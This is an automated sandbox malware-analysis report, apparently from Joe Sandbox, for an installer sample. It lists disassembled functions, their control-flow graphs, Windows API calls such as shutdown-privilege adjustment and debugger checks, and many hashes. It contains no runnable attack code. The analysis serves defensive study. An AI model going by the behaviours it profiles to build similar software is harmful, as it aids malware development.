4703 6c0cccc9-6c0cccd8 4674->4703 4698 6c0cccbc-6c0cccc4 4675->4698 4721 6c0cc52c-6c0cc531 4676->4721 4722 6c0cc9bd-6c0cc9c5 4676->4722 4677->4722 4709 6c0cc41d 4678->4709 4705 6c0cc7ac-6c0cc7b1 4679->4705 4706 6c0ccce0-6c0cccf5 4679->4706 4725 6c0cca43-6c0cca6c 4680->4725 4724 6c0cc59c-6c0cc5a1 4681->4724 4681->4725 4707 6c0ccd28-6c0ccd67 4682->4707 4708 6c0cc7f4-6c0cc7f9 4682->4708 4683->4631 4701 6c0ccd8a-6c0ccd98 4684->4701 4710 6c0ccd9d-6c0ccdad 4685->4710 4711 6c0cc846-6c0cc84b 4685->4711 4726 6c0ccaa0-6c0ccb03 call 6c0cce50 CreateFileA 4686->4726 4727 6c0cc5e0-6c0cc5e5 4686->4727 4687->4631 4712 6c0cc879-6c0cc8a6 4688->4712 4688->4713 4704 6c0ccdc4-6c0ccdd5 4689->4704 4690->4701 4714 6c0cc468-6c0cc46d 4691->4714 4715 6c0cc960-6c0cc975 4691->4715 4694 6c0ccb39-6c0ccb5c 4692->4694 4695 6c0cc659-6c0cc65e 4692->4695 4693->4631 4694->4631 4695->4631 4729 6c0cc664-6c0cc674 4695->4729 4696->4631 4697->4631 4731 6c0cc6a5-6c0cc6d1 4697->4731 4698->4631 4730 6c0ccc8d-6c0ccc9e 4699->4730 4700->4631 4732 6c0cc702-6c0cc73d 4700->4732 4701->4631 4702->4631 4733 6c0cc763-6c0cc791 4702->4733 4703->4706 4704->4631 4705->4631 4734 6c0cc7b7-6c0cc7d9 4705->4734 4706->4709 4707->4631 4708->4631 4735 6c0cc7ff-6c0cc82b 4708->4735 4736 6c0cc420-6c0cc424 4709->4736 4710->4689 4711->4631 4738 6c0cc851-6c0cc85e 4711->4738 4712->4631 4713->4631 4737 6c0cce3c-6c0cce47 4713->4737 4714->4631 4739 6c0cc46f-6c0cc483 4714->4739 4715->4631 4716->4730 4717->4631 4718->4736 4719->4631 4740 6c0cc4d2-6c0cc4fa call 6c0c2a20 call 6c0c2a30 4719->4740 4720->4704 4721->4631 4742 6c0cc537-6c0cc561 4721->4742 4741 6c0cc9ca-6c0cc9f9 4722->4741 4724->4631 4744 6c0cc5a7-6c0cc5ba 4724->4744 4725->4631 4726->4631 4727->4631 4746 6c0cc5eb-6c0cc633 4727->4746 4729->4741 4730->4631 4731->4631 4732->4631 4733->4698 4734->4701 4735->4631 4736->4631 4738->4741 4739->4704 4740->4631 4741->4631 4742->4631 4744->4631 4746->4631 4751->4631
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @*Z$@*Z
                            • API String ID: 0-2842812045
                            • Opcode ID: 1aeb28f609ce04d60525318ae7e6c8bf2e954f3e8f5c2bd6119799e3c2bda447
                            • Instruction ID: 3786698b55fdc35a7e0518e053a4de277dcf2f7d0610e667cf334f1fd72dc557
                            • Opcode Fuzzy Hash: 1aeb28f609ce04d60525318ae7e6c8bf2e954f3e8f5c2bd6119799e3c2bda447
                            • Instruction Fuzzy Hash: EB4266706093428FCB14DF28C49166EBBE1AB89308F648D6EF49AC7762D335D985CB43
                            Function 6C10F015 Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4755 6c10f015-6c10f029 call 6c114c92 4758 6c10f02b-6c10f02d 4755->4758 4759 6c10f02f-6c10f037 4755->4759 4760 6c10f07d-6c10f09d call 6c114e0f 4758->4760 4761 6c10f042-6c10f045 4759->4761 4762 6c10f039-6c10f040 4759->4762 4771 6c10f0ab 4760->4771 4772 6c10f09f-6c10f0a9 call 6c1030e2 4760->4772 4765 6c10f063-6c10f073 call 6c114c92 CloseHandle 4761->4765 4766 6c10f047-6c10f04b 4761->4766 4762->4761 4764 6c10f04d-6c10f061 call 6c114c92 * 2 4762->4764 4764->4758 4764->4765 4765->4758 4774 6c10f075-6c10f07b GetLastError 4765->4774 4766->4764 4766->4765 4776 6c10f0ad-6c10f0b0 4771->4776 4772->4776 4774->4760
                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,?,6C11794F), ref: 6C10F06B
                            • GetLastError.KERNEL32(?,00000000,?,6C11794F), ref: 6C10F075
                            • __dosmaperr.LIBCMT ref: 6C10F0A0
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CloseErrorHandleLast__dosmaperr
                            • String ID:
                            • API String ID: 2583163307-0
                            • Opcode ID: 391754e8fdcd68bb36aa4875df5659078a34cb8fd036f82c59d21af8295c6a6f
                            • Instruction ID: a0f5e577ddc09dd06d91e641700790c6ff204cc89961f16a718278dd2724dd34
                            • Opcode Fuzzy Hash: 391754e8fdcd68bb36aa4875df5659078a34cb8fd036f82c59d21af8295c6a6f
                            • Instruction Fuzzy Hash: AC014E3770A2202BD6101239D8467AE376B4BC3B3CF398759E93487FC5EF69D4848294
                            Function 6C10428C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 5000 6c10428c-6c104297 5001 6c104299-6c1042ac call 6c1030bc call 6c103810 5000->5001 5002 6c1042ae-6c1042bb 5000->5002 5013 6c104300-6c104302 5001->5013 5004 6c1042f6-6c1042ff call 6c10e565 5002->5004 5005 6c1042bd-6c1042d2 call 6c1043a9 call 6c10be2e call 6c10d350 call 6c10ef88 5002->5005 5004->5013 5019 6c1042d7-6c1042dc 5005->5019 5020 6c1042e3-6c1042e7 5019->5020 5021 6c1042de-6c1042e1 5019->5021 5020->5004 5022 6c1042e9-6c1042f5 call 6c107eab 5020->5022 5021->5004 5022->5004
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction ID: 8350f028c35655e5fc2ffe01cee6c4dc7a4e68c9297417a68520cdbce8c8fc44
                            • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction Fuzzy Hash: 1FF02832B016205AD6315A3AAC40BCB33A88F6237CF514B29E92097EC0DF34D50B86E1
                            Function 6C0F9050 Relevance: 3.1, APIs: 2, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0F91A4
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0F91E4
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID:
                            • API String ID: 323602529-0
                            • Opcode ID: 24a16ad9f4365bf589f853616afcb37af3b8da0a8eba193683946e7e29bdbaa4
                            • Instruction ID: cb56feea906fd1d14e433c1bf5ec657bf3ef869b1b7495f6cd4a5b79f82efdd0
                            • Opcode Fuzzy Hash: 24a16ad9f4365bf589f853616afcb37af3b8da0a8eba193683946e7e29bdbaa4
                            • Instruction Fuzzy Hash: 41515971101B00DBD725CF25C895BE7BBF4FB05718F448A2CE8AA47AA1DB35B589CB80
                            Function 6C10262F Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(6C129DD0,0000000C), ref: 6C102642
                            • ExitThread.KERNEL32 ref: 6C102649
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorExitLastThread
                            • String ID:
                            • API String ID: 1611280651-0
                            • Opcode ID: fa82292a6aa0e36ee9e51b90252213097788ab094063836d5daa1bf828fc0a39
                            • Instruction ID: 0df37ed0981ba17d129014a94ae4433ed5a1e651b3880301bdaf8d0368986c4e
                            • Opcode Fuzzy Hash: fa82292a6aa0e36ee9e51b90252213097788ab094063836d5daa1bf828fc0a39
                            • Instruction Fuzzy Hash: 30F0C275B00204AFDB00AFB0C84DBAE7B74FF45214F140549E40197B91DF35A985DFA1
                            Function 6C10E662 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: 23f67715b0627b500c1a1837273300f289b9fe750c9605b98d080578e430f9ca
                            • Instruction ID: 12e895623f3844da79fdeddd06a45dbb05635edc55d49c77215cd5b001435ea0
                            • Opcode Fuzzy Hash: 23f67715b0627b500c1a1837273300f289b9fe750c9605b98d080578e430f9ca
                            • Instruction Fuzzy Hash: 21118C71A0420AAFCF05CF59E944A9B3BF8EF48304F10406AF804AB301DA30EE21CBA4
                            Function 6C1176EE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction ID: 7259e54794bf41854ff4d5ac4812342929c18504ad46e5d5405d9b4e6585902f
                            • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction Fuzzy Hash: A6014B72C0515ABFCF019FA8CC04AEEBFF5AF08214F144166ED24E26A0E7358A65DBD1
                            Function 6C117B47 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000000,?,6C117805,?,?,00000000,?,6C117805,00000000,0000000C), ref: 6C117B64
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: b80bfac13adcc0dcdbef3518a958e1061b4c1509ba4206a77fca6cf386e198a8
                            • Instruction ID: 488f6648b9345ec5ed66b3c7deb1708924f3f2c30168036e68ac781dc333a90f
                            • Opcode Fuzzy Hash: b80bfac13adcc0dcdbef3518a958e1061b4c1509ba4206a77fca6cf386e198a8
                            • Instruction Fuzzy Hash: 51D06C3210014DBBDF028E84DC06EDA3BAAFB48715F014000BA1856020C736E861AB91
                            Function 6BFC83A0 Relevance: 1.5, APIs: 1, Instructions: 1COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction ID: e8a022fbe185863756c581dfdb271ef419585068e1407d78ac5f5ba19188b9de
                            • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction Fuzzy Hash:

                            Non-executed Functions

                            Function 6C0F4860 Relevance: 11.0, APIs: 3, Strings: 1, Instructions: 4048COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: C
                            • API String ID: 4218353326-4157497815
                            • Opcode ID: 54e74848e73e09edbd813008685433ee66288c8709a4ab9c08ca174b23a50a4b
                            • Instruction ID: a41264f7ba7a822424eaaa95a9e3a59da206a88091fe5d4966b9074a77ff0624
                            • Opcode Fuzzy Hash: 54e74848e73e09edbd813008685433ee66288c8709a4ab9c08ca174b23a50a4b
                            • Instruction Fuzzy Hash: 99730531644B018FC728CF29C8D0B99B7F2AF853187598B6DC4A787A55EB74B58BCB40
                            Function 6C0F9450 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 31nativeshutdownCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 6C0F945A
                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C0F9466
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C0F9474
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C0F949B
                            • NtInitiatePowerAction.NTDLL ref: 6C0F94AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3256374457-3733053543
                            • Opcode ID: 1fae9e7ecd37cf5c00e256cb8d1f38fcee15b89cd61675b13a884f889eff45bc
                            • Instruction ID: e9cb8d0cb464210cd5bb71488e80fdc919790c6359b5063c64ef94c997dbeaa5
                            • Opcode Fuzzy Hash: 1fae9e7ecd37cf5c00e256cb8d1f38fcee15b89cd61675b13a884f889eff45bc
                            • Instruction Fuzzy Hash: 18F0B470644304ABEB00AF28DD0EB5A7BF8EF45711F004A09F995AA0D1D7706994DBD2
                            Function 6BF71950 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 594COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: \j`7$\j`7$j
                            • API String ID: 0-3644614255
                            • Opcode ID: 316df1dd6c9b22930569af15fcd97da15e152250726c248d6bf56a03af2ecf85
                            • Instruction ID: e784828850beba515725c045f0b83c9fa0ad7c4f7d3b5db1c3480111737dc1cc
                            • Opcode Fuzzy Hash: 316df1dd6c9b22930569af15fcd97da15e152250726c248d6bf56a03af2ecf85
                            • Instruction Fuzzy Hash: 784235766083828FCB24CF68D49065ABBE1BBCA354F1449AEE4D5C7360D339D94ACB53
                            Function 6C159CE0 Relevance: 5.4, APIs: 1, Strings: 1, Instructions: 1923COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C159CE5
                              • Part of subcall function 6C12FC2A: __EH_prolog.LIBCMT ref: 6C12FC2F
                              • Part of subcall function 6C1316A6: __EH_prolog.LIBCMT ref: 6C1316AB
                              • Part of subcall function 6C159A0E: __EH_prolog.LIBCMT ref: 6C159A13
                              • Part of subcall function 6C159837: __EH_prolog.LIBCMT ref: 6C15983C
                              • Part of subcall function 6C15D143: __EH_prolog.LIBCMT ref: 6C15D148
                              • Part of subcall function 6C15D143: ctype.LIBCPMT ref: 6C15D16C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog$ctype
                            • String ID:
                            • API String ID: 1039218491-3916222277
                            • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                            • Instruction ID: 2d3e0bf60b2ba1b81e5fbcda9cb2db47ff3f229edfa9b85c67260bf27cbf4251
                            • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                            • Instruction Fuzzy Hash: D103DFB0800248DFDF11DFA4C990BECBBB0AF15308F5480D9D46967B91DB789B9ADB61
                            Function 6C103871 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6C103969
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6C103973
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6C103980
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: e0e3d2c83ce8c3c400186d4831a9684517a4bca36d3c1e6fa2560558c956fa0f
                            • Instruction ID: 56374d8d5aad9dad409daa048e537af33555a9d75d0975967a9b0f4db428302d
                            • Opcode Fuzzy Hash: e0e3d2c83ce8c3c400186d4831a9684517a4bca36d3c1e6fa2560558c956fa0f
                            • Instruction Fuzzy Hash: AD31A47490121DABCB61DF69D988BCDBBF8BF08314F5045EAE81CA7250EB749B858F44
                            Function 6C10286D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,?,6C102925,6C0FD339,00000003,00000000,6C0FD339,00000000), ref: 6C10288F
                            • TerminateProcess.KERNEL32(00000000,?,6C102925,6C0FD339,00000003,00000000,6C0FD339,00000000), ref: 6C102896
                            • ExitProcess.KERNEL32 ref: 6C1028A8
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
